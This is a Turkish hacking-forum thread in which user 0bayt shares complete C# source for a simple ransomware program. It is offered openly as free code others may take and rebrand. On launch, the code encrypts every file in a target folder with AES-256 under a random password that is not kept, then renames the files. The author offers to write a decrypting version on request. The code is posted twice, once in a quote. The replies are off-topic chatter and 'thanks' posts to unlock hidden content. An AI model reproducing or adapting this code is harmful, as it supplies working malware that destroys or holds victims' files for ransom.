Basit fidye virüsü //By 0bayt (1 Viewer)

Credits
0
Rating - 0%
Selamlar bugün bolca zamanım oldu ve yeni kayıt olduğum için foruma katkıda bulunmak istedim.

Yazarken kullandığım programlama dili C#, kullandığım şifreleme algoritması ise AES256'dır.
View hidden content is available for registered users!

Code:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.IO; //Zorunlu!
using System.Security.Cryptography; //Zorunlu!
namespace FidyeVirüsü
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
            string[] dosyalar = Directory.GetFiles(@"Kriptolonacak dosyaların yolu buraya yazılır isterseniz rasgele şekilde baştan tasarlayabilirsiniz ama mantık diziler üzerinden hazırlanmıştır");
            for (int i = 0; i < dosyalar.Length; i++)
            {
                Random Parola = new Random();
                EncryptFile(dosyalar[i].ToString(), Parola.Next(1, 500).ToString()); //dosyaları dosyalar isimli diziden alır  - parola ise 1 ile 500 arasında rasgele bir sayıdan oluşur (methodu inceleyerek daha iyi anlayabilirisiniz)
                File.Move(dosyalar[i], dosyalar[i]+".şifrelenmişdosyauzantısı");
            }
        }

private void Form1_Load(object sender, EventArgs e)
        {

}
        public void EncryptFile(string file, string password) //Şifrelemeyi yapan methodumuz
        {

byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
            byte[] passwordBytes = Encoding.UTF8.GetBytes(password);

// Hash the password with SHA256
            passwordBytes = SHA256.Create().ComputeHash(passwordBytes);

byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);

string fileEncrypted = file;

File.WriteAllBytes(fileEncrypted, bytesEncrypted);
        }
        public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) //algoritmamızın bulunduğu method
        {
            byte[] encryptedBytes = null;
            byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };

using (MemoryStream ms = new MemoryStream())
            {
                using (RijndaelManaged AES = new RijndaelManaged())
                {
                    AES.KeySize = 256;
                    AES.BlockSize = 128;

var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
                    AES.Key = key.GetBytes(AES.KeySize / 8);
                    AES.IV = key.GetBytes(AES.BlockSize / 8);

AES.Mode = CipherMode.CBC;

using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write))
                    {
                        cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
                        cs.Close();
                    }
                    encryptedBytes = ms.ToArray();
                }
            }

return encryptedBytes;
        }
    }
}

Ayrıca ekstra sorunuz varsa alabilirim.

Not : Bu fidye virüsü sadece şifreleme işlemi yapmaktadır istek olursa ekstra çözme işlemide yapılan bir fidye virüsü kodlayabilirim

Not : Program benim tarafımdan yazılmıştır isteyen kaynak kodunu düzenleyerek "ben yaptım" vs. diyerek paylaşabilir iyi forumlar

Last edited:

Kare 

Kare Kurt
Credits
167
Rating - 0%
Eline sağlık ağabey ben bu fidye yazılımlara çok ilgi duyuyorum bir makale vs varsa okumak isterim

Kare 

Kare Kurt
Credits
167
Rating - 0%
Emin ol çok sağlam geçiyor kanka çee ingilizceden 20 aldım amk asdjhjajdsa matematik fizikim 90 üstü sadece gerisi 50 altı çee
matematik 20 biyoloji 35 edebiyat 43 ingilizce 85 ispanyolca 46 fizik kimyada düşük gelcek ayağım kırıldı 20 gün gidemedim sınavlarda kan alıyorlar şimdi

R

Rolesa

matematik 20 biyoloji 35 edebiyat 43 ingilizce 85 ispanyolca 46 fizik kimyada düşük gelcek ayağım kırıldı 20 gün gidemedim sınavlarda kan alıyorlar şimdi
Benim yine sayısallar iyi çee Geçmiş olsun bro bide burdan konuşmayalım chatrooma dönüyor :p

Credits
0
Rating - 0%
Selamlar bugün bolca zamanım oldu ve yeni kayıt olduğum için foruma katkıda bulunmak istedim.

Yazarken kullandığım programlama dili C#, kullandığım şifreleme algoritması ise AES256'dır.
View hidden content is available for registered users!

Code:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.IO; //Zorunlu!
using System.Security.Cryptography; //Zorunlu!
namespace FidyeVirüsü
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
            string[] dosyalar = Directory.GetFiles(@"Kriptolonacak dosyaların yolu buraya yazılır isterseniz rasgele şekilde baştan tasarlayabilirsiniz ama mantık diziler üzerinden hazırlanmıştır");
            for (int i = 0; i < dosyalar.Length; i++)
            {
                Random Parola = new Random();
                EncryptFile(dosyalar[i].ToString(), Parola.Next(1, 500).ToString()); //dosyaları dosyalar isimli diziden alır  - parola ise 1 ile 500 arasında rasgele bir sayıdan oluşur (methodu inceleyerek daha iyi anlayabilirisiniz)
                File.Move(dosyalar[i], dosyalar[i]+".şifrelenmişdosyauzantısı");
            }
        }

private void Form1_Load(object sender, EventArgs e)
        {

}
        public void EncryptFile(string file, string password) //Şifrelemeyi yapan methodumuz
        {

byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
            byte[] passwordBytes = Encoding.UTF8.GetBytes(password);

// Hash the password with SHA256
            passwordBytes = SHA256.Create().ComputeHash(passwordBytes);

byte[] bytesEncrypted = AES_Encrypt(bytesToBeEncrypted, passwordBytes);

string fileEncrypted = file;

File.WriteAllBytes(fileEncrypted, bytesEncrypted);
        }
        public byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes) //algoritmamızın bulunduğu method
        {
            byte[] encryptedBytes = null;
            byte[] saltBytes = new byte[] { 1, 2, 3, 4, 5, 6, 7, 8 };

using (MemoryStream ms = new MemoryStream())
            {
                using (RijndaelManaged AES = new RijndaelManaged())
                {
                    AES.KeySize = 256;
                    AES.BlockSize = 128;

var key = new Rfc2898DeriveBytes(passwordBytes, saltBytes, 1000);
                    AES.Key = key.GetBytes(AES.KeySize / 8);
                    AES.IV = key.GetBytes(AES.BlockSize / 8);

AES.Mode = CipherMode.CBC;

using (var cs = new CryptoStream(ms, AES.CreateEncryptor(), CryptoStreamMode.Write))
                    {
                        cs.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
                        cs.Close();
                    }
                    encryptedBytes = ms.ToArray();
                }
            }

return encryptedBytes;
        }
    }
}

Not : Bu fidye virüsü sadece şifreleme işlemi yapmaktadır istek olursa ekstra çözme işlemide yapılan bir fidye virüsü kodlayabilirim

Not : Program benim tarafımdan yazılmıştır isteyen kaynak kodunu düzenleyerek "ben yaptım" vs. diyerek paylaşabilir iyi forumlar
es

Credits
0
Rating - 0%

[Gizli içerik]

Credits
4
Rating - 0%
eyw

[Gizli içerik]

Credits
131
Rating - 0%

[Gizli içerik]

bkk

DeJaVu

Valar Dohaeris
Credits
1,276
Rating - 0%

[Gizli içerik]

look

Credits
1
Rating - 0%

[Gizli içerik]

Bakalım

Users who are viewing this thread